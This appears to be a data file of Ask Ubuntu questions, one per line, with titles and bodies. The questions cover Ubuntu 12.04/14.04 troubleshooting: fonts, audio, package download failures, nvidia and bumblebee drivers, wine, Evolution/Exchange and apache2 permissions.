514108	fonts that appear on xfontsel vs `` other fonts ''	i am looking for good fonts to use on osdsh as far as i can tell ( see passing a font as an argument to a script ) these are the fonts xfontsel lists to me these , unfortunately , seem rather limited ( and more , seem to have diminished from 12.04 to 14.04 ) . also , they are limited in size ( the biggest one is 32 px , the biggest one on 12.04 was 34 ) now , i found other fonts elsewhere ( for example , following http : //community.linuxmint.com/tutorial/view/1021 ) . using those instructions , i found , in my system , a lot of fonts , in all sizes ( well ... at least up to 60 px ) i presume they are fonts `` of a different kind '' . my question : can i use these nice , 60px fonts on my original aplication ? can i find more ( and bigger ) `` xfontsel '' fonts elsewhere ? regarding the bounty , things i 'd like to understand : 1. the different systems that manage fonts 2. which of these systems is relevant for xfontsel 3. which of these systems is relevant for osdsh ( the same ? ) 4. a way to get more fonts for 2 and 3
514112	sound disappears in ubuntu 14.04	i 'm a newbie in ubuntu and i have a problem : sound in ubuntu 14.04 disappears sometimes ( often , to be honest ) . sound controller is envy24 . randomly i managed to find out how to fix it partially : it 's needed to set speech dispatcher ( at /etc/default/speech-dispatcher ) run property on an opposite value , then reboot , then change the value again , then reboot again , then repeat all of this and after that sound appears again . until the next restart . how to fix it properly ?
514114	failed to download package files - new hardware support	i have software updates that the update manager downloads and installs just fine . but it also show a line that says `` new hardware support is available '' with a button to install . when pressing this button i get : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/l/llvm-toolchain-3.4/libllvm3.4_3.4-1ubuntu3~precise1_amd64.deb could not connect to il.archive.ubuntu.com:80 ( 192.115.211.70 ) . - connect ( 110 : connection timed out ) failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libglapi-mesa-lts-trusty_10.1.3-0ubuntu0.1~precise1_i386.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libgl1-mesa-glx-lts-trusty_10.1.3-0ubuntu0.1~precise1_i386.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libglapi-mesa-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libgl1-mesa-glx-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xorg-server-lts-trusty/xserver-common-lts-trusty_1.15.1-0ubuntu2~precise2_all.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xorg-server-lts-trusty/xserver-xorg-core-lts-trusty_1.15.1-0ubuntu2~precise2_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/g/glamor-egl-lts-trusty/libglamor-ltst0_0.6.0-0ubuntu4~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/w/wayland-lts-trusty/libwayland-ltst-client0_1.4.0-1ubuntu1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/w/wayland-lts-trusty/libwayland-ltst-server0_1.4.0-1ubuntu1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libgbm1-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libegl1-mesa-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/g/glamor-egl-lts-trusty/xserver-xorg-video-glamoregl-lts-trusty_0.6.0-0ubuntu4~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-r128-lts-trusty/xserver-xorg-video-r128-lts-trusty_6.9.2-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-mach64-lts-trusty/xserver-xorg-video-mach64-lts-trusty_6.9.4-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-ati-lts-trusty/xserver-xorg-video-radeon-lts-trusty_7.3.0-1ubuntu3.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-ati-lts-trusty/xserver-xorg-video-ati-lts-trusty_7.3.0-1ubuntu3.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-cirrus-lts-trusty/xserver-xorg-video-cirrus-lts-trusty_1.5.2-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-fbdev-lts-trusty/xserver-xorg-video-fbdev-lts-trusty_0.4.4-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-intel-lts-trusty/xserver-xorg-video-intel-lts-trusty_2.99.910-0ubuntu1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-mga-lts-trusty/xserver-xorg-video-mga-lts-trusty_1.6.3-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-modesetting-lts-trusty/xserver-xorg-video-modesetting-lts-trusty_0.8.1-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-neomagic-lts-trusty/xserver-xorg-video-neomagic-lts-trusty_1.2.8-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-nouveau-lts-trusty/xserver-xorg-video-nouveau-lts-trusty_1.0.10-1ubuntu2~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-openchrome-lts-trusty/xserver-xorg-video-openchrome-lts-trusty_0.3.3-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-s3-lts-trusty/xserver-xorg-video-s3-lts-trusty_0.6.5-0ubuntu4~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-savage-lts-trusty/xserver-xorg-video-savage-lts-trusty_2.3.7-2ubuntu2~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-siliconmotion-lts-trusty/xserver-xorg-video-siliconmotion-lts-trusty_1.7.7-2build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-sis-lts-trusty/xserver-xorg-video-sis-lts-trusty_0.10.7-0ubuntu6~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-sisusb-lts-trusty/xserver-xorg-video-sisusb-lts-trusty_0.9.6-2build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-tdfx-lts-trusty/xserver-xorg-video-tdfx-lts-trusty_1.4.5-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-trident-lts-trusty/xserver-xorg-video-trident-lts-trusty_1.3.6-0ubuntu5~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-vesa-lts-trusty/xserver-xorg-video-vesa-lts-trusty_2.3.3-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xorg-lts-trusty/xserver-xorg-video-all-lts-trusty_7.7+1ubuntu8~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-input-evdev-lts-trusty/xserver-xorg-input-evdev-lts-trusty_2.8.2-1ubuntu2~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-input-synaptics-lts-trusty/xserver-xorg-input-synaptics-lts-trusty_1.7.4-0ubuntu1~precise2_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-input-mouse-lts-trusty/xserver-xorg-input-mouse-lts-trusty_1.9.0-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-input-vmmouse-lts-trusty/xserver-xorg-input-vmmouse-lts-trusty_13.0.0-1build1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/libx/libxrandr-lts-trusty/libxrandr-ltst2_1.4.2-1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xf86-input-wacom-lts-trusty/xserver-xorg-input-wacom-lts-trusty_0.23.0-0ubuntu2~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xorg-lts-trusty/xserver-xorg-input-all-lts-trusty_7.7+1ubuntu8~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xorg-lts-trusty/xserver-xorg-lts-trusty_7.7+1ubuntu8~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libgl1-mesa-dri-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libxatracker2-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/xserver-xorg-video-vmware-lts-trusty/xserver-xorg-video-vmware-lts-trusty_13.0.2-2ubuntu1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/e/elfutils/libelf1_0.152-1ubuntu3_i386.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libopenvg1-mesa-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libwayland-egl1-mesa-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libegl1-mesa-drivers-lts-trusty_10.1.3-0ubuntu0.1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/l/llvm-toolchain-3.4/libllvm3.4_3.4-1ubuntu3~precise1_i386.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/m/mesa-lts-trusty/libgl1-mesa-dri-lts-trusty_10.1.3-0ubuntu0.1~precise1_i386.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/s/s2tc/libtxc-dxtn-s2tc0_0~git20110809-2.1_amd64.deb unable to connect to il.archive.ubuntu.com : http : failed to fetch http : //il.archive.ubuntu.com/ubuntu/pool/main/x/x11-xserver-utils-lts-trusty/x11-xserver-utils-lts-trusty_7.7+2ubuntu1~precise1_amd64.deb unable to connect to il.archive.ubuntu.com : http :
514115	high pitch sound from tv conected to hdmi	audio does work but there is a high pitched sound coming from the tv when it is connected and selected as sound output via hdmi in ubuntu 14.04 . i have not tinkered with any drivers or sound configs . i do n't know why it does this as this problem is not present in windows 8 . i really want to use ubuntu instead of windows . any ideas ?
514116	is there any way to fix hotkeys for some aps ( russian layout ) ?	although this issue is considered to be solved , shortcuts are not working for a number of applications . for okular and sigram hotkeys ( in russian layout ) are not working at all . for goldendict they are not working in a popup window . this is not a huge problem of course , but fixing it would make me happy . i 'm using ubuntu 14.04 64
514117	wine is not working properly	i have installed wine but it works very strange.when i started some prog , in panel appeared icon of running wine , but nothing else . when i click on wine icon i get empty screen , alt+tab = same result .
514118	lost the root privilege after try to add the user to a group	my user lost root privilege after try to add the user to a group . it 's looks like the `` usermod xxxx -- groups ... '' change the from the root group to the new one , it 's a mistake but the thing is my user lost all root privilege and as you know , ubuntu un the instalation process ask to create an user ( the uniqueone i have ) with root privilege but never ask ( if i 'm not wrong ) to give an password to root user . how can i fix this ? how can i recover root capacity ? yesterday i tried to boot in `` save mode '' but i could n't , i have just ubuntu installed in my pc and when i tried to get the grub windows ( whit esc ) it just show a console with `` grub > '' and some instructions that i`ve never seen before and do n't understand . i do n't know what to ...
514119	1204_hwe_eol and pentium iii	i have a home server running ubuntu server 12.04 on a pentium iii 933mhz . it has been working well for quite a while - mainly minidlna , samba , and transmission-bt . when 14.04 was released i did a clean install , struggled to find minidlna but all was well except it would hang often . so i reinstalled 12.04 and all was well . now i am getting this 1204 hwe eol message . so i followed the instructions to install the trusty packages . and - guess what ? - it hangs all the time . have to push the reset button . so i downgraded to 12.04 and again all is well . is the 14.04 kernel and hwe not compatible with a pentium iii ? shall i just ignore these messages and continue with 12.04 . the packages are all up to date except for the kernel .
514120	suddenly the tomcat got killed and i am seeing the fatal error in the catalina.out logs	here i am attaching the fatal error can anyone please explain me what is the main problem for this
514122	what would be a free open source password manager that works on ubuntu and windows 8 ( cross platform software ) ?	i am looking for a password manager that can store passwords along with auto login by auto filling passwords in on a website that is stored in a vault that is compatible with ubuntu and windows 8 . i do n't want to use keepassx or keepass as i have not been able to find a plugin that works with ubuntu keepassx on firefox that will auto fill . their is one that works with keepass but since keepass plugins always require the latest version of keepass their is too long of a lag time before ubuntu keepass updates to that version ... p.s : lastpass is currently out of the question too since you have to pay for the premium version to access it on the phone .
514123	how to bring back older version of mesa packages from ppa : xorg-edgers/ppa	i 'm trying to install older version of mesa packages from xorg-edgers ppa using following command : sudo apt-get install libgl1-mesa-dev=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty mesa-common-dev=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libgl1-mesa-dri : i386=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libgl1-mesa-dri : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libgl1-mesa-glx : i386=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libgl1-mesa-glx : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libosmesa6 : i386=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libosmesa6 : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libwayland-egl1-mesa : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libegl1-mesa-drivers : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libgles2-mesa-dev=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libgles2-mesa : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libglapi-mesa : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libglapi-mesa : i386=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libopenvg1-mesa : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty libegl1-mesa : amd64=10.3.0~git20140812.fa5b76e3-0ubuntu0ricotz~trusty unfortunately i receive that there is no such a version for each package.. could you please verify if i put it in wrong format or the packages no longer exist ?
514125	url protocol handlers in basic ubuntu desktop	there was a way to register url protocol handlers with gconf , which is now obsolete and there seems to be no way to do the same with dconf ( or gsettings , its recommended wrapper ) . how do one properly register an url protocol handlers since dconf ? additionally , something looks strange to me ( as i do n't understand it ) , on my ubuntu 12.04 the protocol apt : // should be handled by the apturl command . it is so with my opera browser , but only because i added this specific association using the browser 's configuration facility . otherwise , in the rest of the environment : running xdg-open apt : //foo.bar opens elinks ( my www-browser alternative ) . running gnome-open apt : //foo.bar opens the software center . opening gcong-editor , i see a key /desktop/gnome/url-handlers/apt whose value is apturl `` % s '' and its enable . this configuration seems to be ignored , which is reasonably expected , as gconf is considered obsolete . opening dconf-editor , i ca n't see anything related to url handlers or protocols in /desktop/gnome it looks a bit messy to my eyes ( just teasing with this wording , nothing bad ) what 's underneath ? side note : i 'm looking for something which preferably works even when the full desktop environment is not loaded , like when running an i3wm session with only gsettings-daemon ( and other stuffs unrelated to this case ) is loaded . update another way to “register” a protocol handler is with *.desktop files and their mime-type ; ex . mimetype=application/ < the-protocol > ; . i found a /usr/share/applications/ubuntu-software-center.desktop with this content : [ desktop entry ] name=ubuntu software center genericname=software center comment=lets you choose from thousands of applications available for ubuntu exec=/usr/bin/software-center % u icon=softwarecenter terminal=false type=application categories=packagemanager ; gtk ; system ; settings ; mimetype=application/x-deb ; application/x-debian-package ; x-scheme-handler/apt ; startupnotify=true x-ubuntu-gettext-domain=software-center keywords=sources ; ppa ; install ; uninstall ; remove ; purchase ; catalogue ; store ; this one explains why gnome-open apt : //foo.bar opens the software center instead of apturl . so i installed this apturl.desktop in ~/.local/share/applications : [ desktop entry ] encoding=utf-8 version=1.0 type=application terminal=false exec=/usr/bin/apturl % u name=apt‑url comment=apt‑url handler icon= categories=application ; network ; mimetype=x-scheme-handler/apt ; after update-desktop-database and even after rebooting , both xdg-open and gnome-open still do the same and ignore this user desktop file , which as usual with user desktop‑files , should override the other in /usr/share/applications/ . may be there is something special with desktop files specifying x-scheme-handler mime type and they are not handled the usual way . the desktop‑file way does not answer the question .
514129	evolution mapi & evo ews not workining in ubuntu 14.04	i recently upgraded my laptop from 12.04 lts to 14.04 lts without problems . first thing i tried is to reconnect evo to our company 's exchange server . so i installed evo-mapi and the evo-ews package and tried to connect to the exchange server by using ews and mapi . in both cases i receive the error , that evo can not resolve a hostname . in the case of ews i receive the error , that the server running the ews service can not be found : [ raptor ] /var/crash > ews_debug=2 evolution ( evolution:5257 ) : camel-warning ** : failed to initialize nss sql database in sql : /etc/pki/nssdb : nss error -8187 sh : 1 : /usr/lib/nspluginwrapper/i386/linux/npviewer : not found sh : 1 : /usr/lib/nspluginwrapper/i386/linux/npviewer : not found *** nsplugin wrapper *** error : failed to execute nsplugin viewer < http/1.1 2 can not resolve hostname ( myserver.mydomain.com ) < soup-debug-timestamp : 1408604840 < soup-debug : esoapmessage 0 ( 0x7fe051025db0 ) ( changed the server name above ... ) in the case of mapi i receive the ( very strange ) error : `` error resolving 'http ' : name or service not known '' the moment i try to authenticate ( either basic or kerberos - that makes no difference ) . i tried nslookup/dig to resolve the hostnames i specified in the configuration . this worked like a charm - so basically the resolver seems to work . my /etc/hosts file looks like this : 127.0.0.1 localhost 127.0.1.1 raptor raptor.lenze.com # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters the /etc/nsswitch.conf hosts line : hosts : files dns i deleted some ( i think ) m $ related stuff from this line . any idea how to resolve this problem ? i 'm sure i 'm doing something wrong ... at least mapi worked in 12.04 ( more or less ) .
514137	how to change default sort order in matlab 's open file dialog ?	the open file dialog in matlab is opened by default with several columns and files are sorted in an alphabetical order . instead , i want to see the files in a single column and ordered by last modified date . is there a way to change it ? the settings of the ubuntu file browser does not seem to influence the defaults of the matlab dialog . is it a standard os open file dialog or something custom ? current : required : i am using : ubuntu 12.10 matlab 7.9 ( r2009b )
514140	14.04.1 failed to load module `` nvidia ''	next try . i have a nvidia geforche 825m graphics card ( optimus ) and an intel integrated graphics card . so i purged every installed nvidia driver ( i tried to get a driver directly from nvidia to work , but did n't worked out ) and installed nvidia-343 , bumblebee and bumblebee-nvidia . i changed the bumblebee.conf to this : # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-343 pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-343 : /usr/lib32/nvidia-343 # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-343/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau the xorg.conf.nvidia file looks like this section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . busid `` pci:01:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection so if i run primusrun pymol than i get this error : primus : fatal : bumblebee daemon reported : error : [ xorg ] ( ee ) nvidia ( gpu-0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please next i checked xorg.0.log grep -e ' ( ee ) ' /var/log/xorg.0.log ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 6.175 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 6.178 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 6.180 ] ( ee ) [ drm ] kms not enabled i googled a lot and tried nearly everything , like deleting .conf and reinstalling but nothing seems to help . any ideas ? bumblebee faq and other sites did not help me . thanks in advance . edit : nouveau is blacklisted . edit2 : i think i nailed down the problem ... if i check ls /usr/lib/xorg/modules/drivers/ no nvidia driver shows up ! i tried to reinstall the driver but it did not changed anything . : ( why is there no nvidia driver ? and how to fix this ? edit3 : copying the nvidia_drv.so from the nvidia-343 folder also does n't solve it . running this sudo update-alternatives -- config x86_64-linux-gnu_gl_conf selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/nvidia-343/ld.so.conf 8604 auto mode 1 /usr/lib/nvidia-343-prime/ld.so.conf 8603 manual mode 2 /usr/lib/nvidia-343/ld.so.conf 8604 manual mode * 3 /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf 500 manual mode and changing to `` 0 '' does n't work either . after reboot back to `` 3 '' . edit4 : really looks like that only the nvidia-331.49 driver is supporting my graphics card . i 'll try again with this one . if i 'm wrong please correct me .
514143	netflix continually asking for silverlight install	i had a problem with the netflix browser asking me to install silverlight all the time i checked the netflix browser `` firefox '' for plugin errors and found one with pipelight when i tried to apply your fix i got an error ... .gnupg/pubring.gpg~ : permission denied -- this forum would n't let me post this following part as a separate answer to my own question so i have just added it directly to my question -- which i fixed with sudo chown -r { your-user-name } . { your-user-name } ~/.gnupg and then i ran sudo pipelight-plugin -- update pipelight-plugin -- update for some reason the first command was not enough , i have started wine-browser before ran it , and i had to remove the .wine-browser folder with : rm -rf .wine-browser and then sudo apt-add-repository ppa : ehoover/compholio sudo apt-get update sudo apt-get install netflix-desktop and that sorted my problem out
514144	no internet on lubuntu 14.04	i have a two computers , one runs w7 and other one runs lubuntu 14.04 . both computers are connected via lan cable to the router , however internet on lubuntu 14.04 gets bugged sometimes . i would like to point out that my router is functional , so i suspect that it 's a lubuntu-related issue . internet on w7 works without problems at all times , but quite often internet on lubuntu is n't working at all , it acts like it 's unplugged , and only way to turn the internet on is to unplug cable that goes to w7 computer and plug it back in , and the lamp on the router turns on and everything works fine . i would like to point out that it 's not a router issue , since i used windows xp before ubuntu and had no problems with internet . so what could be causing this issue ? i 'm a first time linux user , so please keep it simple .
514146	how to get mac like popup notifications on gnome ?	i 'd like to replace normal gnome notifications with the ones like on mac os x , how would one be able to do this ? if its not possible , how can i replace gnome notifications with the ones on unity ?
514147	apache2 : could not open configuration file /etc/apache2/apache2.conf : permission denied	i recently upgraded ubuntu to the latest lts edition on my work laptop , which i use as a lamp development platform . the upgrade was from 12.4 to 14.4 . now i 'm having trouble getting apache up and running again . here is the output from an attempt : antonc @ antonc-laptop : /etc/apache2 $ sudo service apache2 restart * restarting web server apache2 * the apache2 configtest failed . output of config test was : apache2 : could not open configuration file /etc/apache2/apache2.conf : permission denied action 'configtest ' failed . the apache error log may have more information . here is a list of permissions and ownership in /etc/apache , showing that apache2.conf is currently owned by root with permissions 644 . i changed this temporarily to 777 , but this made no difference , so i changed it back to 644. antonc @ antonc-laptop : /etc/apache2 $ ls -l total 80 -rw-r -- r -- 1 root root 7115 jan 7 2014 apache2.conf ... what do i need to do to get apache running again ? is the problem really with apache2.conf or some other setting ? should the conf file be owned by a user other than root ? edit 1 : since orginal post , i have tried : sudo aptitude purge apache2 followed by sudo aptitude install apache2 , but this did not solve the issue . another aptitude purge , then manually removed the config directory with cd /etc and rm -r apache2 . i then performed the aptitude install again , which successfully restored /etc/apache2 to its default state , but apache2 still failed to start giving the same error as above .
